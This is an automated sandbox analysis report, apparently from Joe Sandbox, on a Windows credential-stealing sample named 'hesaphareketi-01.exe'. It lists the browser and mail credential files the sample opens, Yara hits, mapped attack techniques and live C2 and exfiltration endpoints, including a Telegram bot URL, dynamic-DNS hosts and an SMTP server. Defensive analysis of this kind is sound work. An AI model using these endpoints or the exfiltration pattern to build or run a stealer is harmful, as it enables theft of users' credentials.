                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing
                  NTDS1
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524785 Sample: hesaphareketi-01.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 3 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 46 10 other signatures 2->46 8 hesaphareketi-01.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 C:\Users\user\...\hesaphareketi-01.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 hesaphareketi-01.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 12->30 32 mail.obaambalaj.com.tr 77.245.159.27, 49733, 49734, 587 NIOBEBILISIMHIZMETLERITR Turkey 12->32 34 2 other IPs or domains 12->34 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  hesaphareketi-01.exe24%ReversingLabs
                  hesaphareketi-01.exe61%VirustotalBrowse
                  hesaphareketi-01.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  reallyfreegeoip.org0%VirustotalBrowse
                  mail.obaambalaj.com.tr0%VirustotalBrowse
                  api.telegram.org2%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  https://api.telegram.org1%VirustotalBrowse
                  https://www.office.com/0%VirustotalBrowse
                  http://mail.obaambalaj.com.tr0%VirustotalBrowse
                  https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                  https://www.office.com/lB0%VirustotalBrowse
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20a0%VirustotalBrowse
                  https://api.telegram.org/bot3%VirustotalBrowse
                  https://www.office.com/(0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  188.114.96.3
                  truetrueunknown
                  mail.obaambalaj.com.tr
                  77.245.159.27
                  truetrueunknown
                  api.telegram.org
                  149.154.167.220
                  truetrueunknown
                  checkip.dyndns.com
                  193.122.6.168
                  truefalseunknown
                  checkip.dyndns.org
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://duckduckgo.com/chrome_newtabhesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/ac/?q=hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.orghesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icohesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://api.telegram.org/bothesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                    https://www.office.com/lBhesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://chrome.google.com/webstore?hl=enhesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://www.ecosia.org/newtab/hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://varders.kozow.com:8081hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://aborters.duckdns.org:8081hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://ac.ecosia.org/autocomplete?q=hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?Lhesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
